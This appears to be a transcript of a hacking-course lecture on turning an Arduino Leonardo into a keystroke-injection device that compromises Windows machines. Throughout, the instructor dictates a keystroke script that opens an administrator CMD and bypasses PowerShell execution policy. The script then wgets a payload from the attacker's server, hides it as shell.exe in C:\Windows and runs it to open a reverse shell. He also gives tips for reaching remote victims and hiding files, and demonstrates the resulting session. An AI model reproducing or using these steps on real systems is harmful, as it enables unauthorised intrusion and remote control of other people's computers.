Now we're gonna see how we can gain the full access over any Windows operating system just by plugging our Arduino and Leonardo to it. And this is gonna happen in about 3 or 2 seconds or less. So the idea here is we are going to enable our Calanx web server, and we're gonna put our undetectable payload into it. And then we're gonna set a listener to listen for the incoming connections, and then we're gonna program the Arduino Leonardo to download this file and execute it automatically. So now let me go to my Calanx machine, and here you can see that I have already set the listener, and we have talked about all of this in a previous lectures. And it's on port 8080 and the connection is HTTPS. So, and it's very important to enable your Apache web server. So I'm going to show you that my Apache web server is enabled. Okay, you can see that it's active. And if I go to my web server, you can see that my payload is there, and it's called payload7.exe. So whenever I type my Calanx IP address and the payload7.exe, you'll be able to download it through the browser. So now let me come back to my Windows machine and show you how we can program it. Okay, so before we do all of this, I would like to show you the commands and explain my idea to you. So first of all, we are going to create a PowerShell file that will download our payload from our Calanx machine to the target machine. So just let me clarify what I'm talking about. So right now I'm in the desktop. If I type cd desktop, I'll be in the desktop, and the command that I'm going to use it is echo, and then I'm gonna say wget. And this command is used to download the file through PowerShell. And then I'm gonna put double quotes, and inside or between these two quotes, I'm gonna put my Calanx IP address, followed with the payload name. So I'm gonna put 192.168.226 and 146/payload7.exe. So here, very important is if you are hacking in your internal network, you can put your internal IP address. But if you are hacking someone who is over one network, so it's very important here to put the direct URL of your exe file. And there is many websites online allows you to upload your file or your exe file, and it will give you the direct URL of the file. So here, very important to put the direct URL. And I'm gonna put all the links in the description. And the next thing we need to type is minus output or out file that will generate a file called, let's say, for example, you can call it whatever you want, but I'm gonna call it shell.exe. And then we're gonna save this command into a file called download.ps1, and ps1 is the extension of PowerShell. So now let me repeat the command. Echo, we are calling wget to download this file from this direct URL, which is our the direct URL of our Calanx with the payload name. And once we run this file, we will execute this command that will download this payload, and it will generate a file called shell.exe. So it's not gonna be called payload7. It will be called shell.exe. So then I'm going to say and to run more than one command at the same time. And I'm going to say PowerShell, and this is to run PowerShell. And then I'm going to say minus execution policy, and it will be bypass, and it will bypass this file. So the file is download. So here we need to specify the file that we have generated, which is download.ps1. So now let me repeat the command again. So echo will call wget to download this file from our Calanx web server, and it will be generated and called shell.exe. So it's not gonna be payload7.exe, and this command will be saved into a file called download.ps1. So once we generate this file, this command will run, and it will run the PowerShell, and it will run this file that contains this command that will be executed once I hit enter. So just let me show you right now. I'm going to press enter. As you can see, I have generated 2 files at the same time. So this is the first command that has generated the shell.exe, and the second command, the first command has just created this file, and the second command has run this download.ps1 and give us the shell.exe. So if I run shell.exe, I will be able to get a reverse connection. So, but I'm not gonna do all of this right here. I'm gonna do this in the C drive in a file called Windows. So now no one will come here and check the files. And I'm going to run it just by typing shell.exe. So it's very simple. And to do this, you need to get the administrator privileges, or to run CMD with the administrator privileges. Okay, so now let's start typing the right command that will do all of this at the same time. So now let me delete all of this, and let me go to this website that I've talked about, and I'm gonna start with delay for 500 milliseconds. So right now, delay, and I'm gonna say Windows. That will press the Windows key, and it's going to delay for 300 milliseconds, and then it's going to type CMD, and then I'm going to delay it for 400 milliseconds again, and I'm going to say Control Shift Enter. That will hold all the keys at the same time. I press enter, and then I'm going to say delay for 700 milliseconds. That will just wait for 700 milliseconds, and then select the left arrow, and then I'm going to say delay 200, enter. So now we have run the CMD with the administrator privileges, or with as an administrator. So now I'm going to say delay, let's say 300 milliseconds, and I'm going to type string. Now we're going to type all of these commands at the same times. So the command is going to be cd/ that will return us to the C drive, and then I'm going to say and I'm going to say cd Windows. So I'm going to Windows directory, then I'm going to say and now we're going to type the command that I have talked about before. So it's going to be echo wget double quotes, and now I'm going to put my Linux IP address / the payload name, and I'm going to save it and call it shell.exe. Of course, you can call it whatever you want. I mean, this name is suspicious, but I just want to call it shell.exe, and I'm going to save it in a file called download.ps1, and then we are going to run the PowerShell to run the download.ps1 file and download our payload on the target machine. So PowerShell and execution policy, and then we're gonna say bypass, and then we're gonna specify the file, which is the file is gonna be download.ps1, and the last step is I'm gonna say and. So now all the files has been downloaded. Now I'm gonna say and I'm going to say shell.exe to run the shell.exe that we have downloaded. So now we are finished, and I think if I say delay for 400 milliseconds and string exit to exit from the CMD, and then delay 200, enter. So we're gonna test it and see how everything's gonna work. So let me repeat the command just to clarify my idea. So I'm gonna say delay. We are dealing delay for 500 milliseconds, and we are pressing the Windows key that will type CMD, and then we said to Control Shift Enter to ask us to run it as the administrator, and then we are selecting the left arrow because the left arrow is yes, and then delay 200 milliseconds and press enter. Or let's say I don't know, 350 millisecond, then say enter. After that, once we hit enter, we're gonna wait for 300 millisecond and we're gonna type this command. So string cd slash that will return us to the C partition, and then we're going or we will change our directory to Windows. Windows is wrong, let me correct it. Okay, let's like this, cd Windows, and then so right now we are in C in Windows directory. So now we are gonna generate the file that's called download.ps1, and then we will run this download.ps1 file that will download the shell.exe. And once we get the shell.exe, we're gonna run just by typing shell.exe, and then wait for 400 milliseconds. Actually, we didn't type enter. Okay, so we need to enter this command. So delay for 400 milliseconds, and then press enter, and then delay for 300 milliseconds, and type string exit delay and enter to exit from CMD. So now let's try this command. Now let me open my Arduino program, and you can see here that my listener is ready and it's just waiting for a reverse connection. So let me come back here, and my USB or my Arduino Leonardo is connected. So now I'm gonna make sure that it's connected. Port Arduino Leonardo. Let me delete all of this and paste the code that we have copied. And probably it's gonna work for this first time or the second time, but as I told you in the previous videos, that we have to disconnect it for 3 seconds and reconnect it again after 3 seconds. So I'm gonna say upload, but this I'm gonna save it. I'm gonna say reverse HTTPS connection. I'm gonna save it here, and I'm going to upload it. So let's wait. And as you can see, it didn't work. So I'm going to close the program. I'm going to say refresh, and I'm going to disconnect it for 3 seconds. And now I'm going to connect it again. So as you can see, now let's check. And as you can see, we have got a reverse connection. So now let's type sessions -i1 pwd. And you can see that I'm in Windows directory, and ls, you can see the files that are in Windows directory, and we can type sysinfo, as you can see. And I think that we have the administrator privileges. I'm not sure about that, but let me check this. Probably we don't have the administrator privileges. Let me type uid or id. It's not working. And as you can see, I'm in Windows directory. So you are not an administrator, but let me try again and see. Maybe we can see the result. But probably we are not an administrator because we didn't run it as an administrator. We run the CMD as an administrator, but yeah, as you can see, it's not working. So we learned from this lecture how you can gain the full access over any Windows operating system just by plugging the Arduino Leonardo. And this happened in about 2 seconds, and it's not gonna work for the first time because you are running Arduino program. So make sure to close it and disconnect it and just wait a little bit and connect it again. And the main problem with this Arduino Leonardo is that it doesn't have a case, so it doesn't have that good look or a legit USB. And the second problem is that sometimes you want to just connect it to go to your computer to edit the commands, and it will just execute the command that you have already programmed. So this is not a good feature, and that's why it's cheap. And I highly recommend buying the USB rubber ducky, but in my opinion, just first try the Arduino Leonardo, and then you can try the USB rubber ducky, because the USB rubber ducky has better look, and there is a button that allows you to disable the code, and then you can plug it into your PC and edit the commands. And once you press the button for the second time, it's going to enable the command, or it could be a malicious command, or it could be, I don't know, whatever you want. You can program whatever you want. And if you like this section, please tell me so that I can make a new course about all of this, or hardware hacking just by plugging this or your Android device. And maybe we can use the Raspberry Pi to hack Wi-Fi networks and etc. So if you are interested in these things, just tell me in the Q&A section, and I will be glad to create a new course. And if you have any question about this section, please tell me and I will be glad to respond.